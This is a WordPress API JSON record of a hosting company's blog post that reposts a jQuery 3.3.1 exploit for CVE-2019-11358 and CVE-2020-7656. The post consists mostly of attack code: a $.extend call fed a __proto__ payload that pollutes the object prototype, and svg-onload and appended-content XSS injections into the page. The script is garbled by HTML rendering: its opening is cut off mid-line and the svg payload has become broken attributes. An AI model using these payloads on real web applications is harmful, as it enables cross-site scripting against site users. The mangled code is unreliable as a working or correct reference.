{"id":62575,"date":"2025-04-08T15:40:21","date_gmt":"2025-04-08T12:10:21","guid":{"rendered":"https:\/\/afaghhosting.net\/blog\/jquery-3-3-1-prototype-pollution-xss-exploit\/"},"modified":"2025-04-08T15:40:21","modified_gmt":"2025-04-08T12:10:21","slug":"jquery-3-3-1-prototype-pollution-xss-exploit","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/jquery-3-3-1-prototype-pollution-xss-exploit\/","title":{"rendered":"jQuery 3.3.1 &#8211; Prototype Pollution &#038; XSS Exploit"},"content":{"rendered":"<p><\/p>\n<div>\n<pre><code class=\"language-txt\" style=\"white-space: pre-wrap;\"># Exploit Title: jQuery Prototype Pollution &amp; XSS Exploit (CVE-2019-11358 &amp; CVE-2020-7656)&#13;\n# Google Dork: N\/A&#13;\n# Date: 2025-02-13&#13;\n# Exploit Author: xOryus&#13;\n# Vendor Homepage: https:\/\/jquery.com&#13;\n# Software Link: https:\/\/code.jquery.com\/jquery-3.3.1.min.js&#13;\n# Version: 3.3.1&#13;\n# Tested on: Windows 10, Ubuntu 20.04, Chrome 120, Firefox 112&#13;\n# CVE : CVE-2019-11358, CVE-2020-7656&#13;\n# Category: WebApps&#13;\n&#13;\n# Description:&#13;\n# This exploit abuses two vulnerabilities in jQuery:&#13;\n# - CVE-2020-7656: XSS via improper script handling&#13;\n# - CVE-2019-11358: Prototype Pollution leading to XSS&#13;\n# By injecting payloads into a vulnerable page using jQuery alert('XSS via CVE-2020-7656: ' + document.domain)\"; \/\/ Space after &#13;\n    $('body').append(maliciousContent);&#13;\n    console.log(\"[+] XSS payload (CVE-2020-7656) injected. Alert will be displayed.\");&#13;\n&#13;\n    \/\/ 4. Exploit Prototype Pollution (CVE-2019-11358)&#13;\n    const defaultConfig = {&#13;\n        \"backLink\": \"<a href=\"'https:\/\/example.com'\">Go Back<\/a>\"&#13;\n    };&#13;\n&#13;\n    const maliciousParams = {&#13;\n        \"__proto__\": {&#13;\n            \"backLink\": \"<svg onload=\"alert('XSS\" via=\"\" cve-2019-11358:=\"\" prototype=\"\" pollution=\"\">\"&#13;\n        }&#13;\n    };&#13;\n&#13;\n    \/\/ 5. Merge objects using vulnerable $.extend&#13;\n    let config = $.extend(true, defaultConfig, maliciousParams);&#13;\n    console.log(\"[+] Prototype Pollution executed via $.extend().\");&#13;\n&#13;\n    \/\/ 6. Create a container to inject malicious content&#13;\n    const container = document.createElement('div');&#13;\n    container.id = 'backLinkContainer';&#13;\n    document.body.appendChild(container);&#13;\n&#13;\n    \/\/ 7. Inject malicious content into the DOM&#13;\n    $('#backLinkContainer').html(config.backLink);&#13;\n    console.log(\"[+] XSS payload (CVE-2019-11358) injected into the DOM. Alert will be displayed.\");&#13;\n};&#13;\n&#13;\n\/\/ 8. Instruction message&#13;\nconsole.log(\"[*] Script injected. Waiting for jQuery to load...\");\n            <\/svg><\/code><\/pre>\n<\/p><\/div>\n<p><a href=\"https:\/\/afaghhosting.net]\">\u0622\u0641\u0627\u0642 \u0647\u0627\u0633\u062a\u06cc\u0646\u06af \u0645\u062f\u06cc\u0631\u06cc\u062a \u0633\u0631\u0648\u0631 \u0645\u0634\u0627\u0648\u0631 \u0648 \u067e\u0634\u062a\u06cc\u0628\u0627\u0646 \u0641\u0646\u06cc <\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: jQuery Prototype Pollution &amp; XSS Exploit (CVE-2019-11358 &amp; CVE-2020-7656)&#13; # Google Dork: N\/A&#13; # Date: 2025-02-13&#13; # Exploit Author: xOryus&#13; # Vendor Homepage: https:\/\/jquery.com&#13; # Software Link: https:\/\/code.jquery.com\/jquery-3.3.1.min.js&#13; # Version: 3.3.1&#13; # Tested on: Windows 10, Ubuntu 20.04, Chrome 120, Firefox 112&#13; # CVE : CVE-2019-11358, CVE-2020-7656&#13; # Category: WebApps&#13; &#13; # &hellip;<\/p>\n","protected":false},"author":1,"featured_media":62562,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-62575","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/62575","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=62575"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/62575\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media\/62562"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=62575"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=62575"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=62575"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}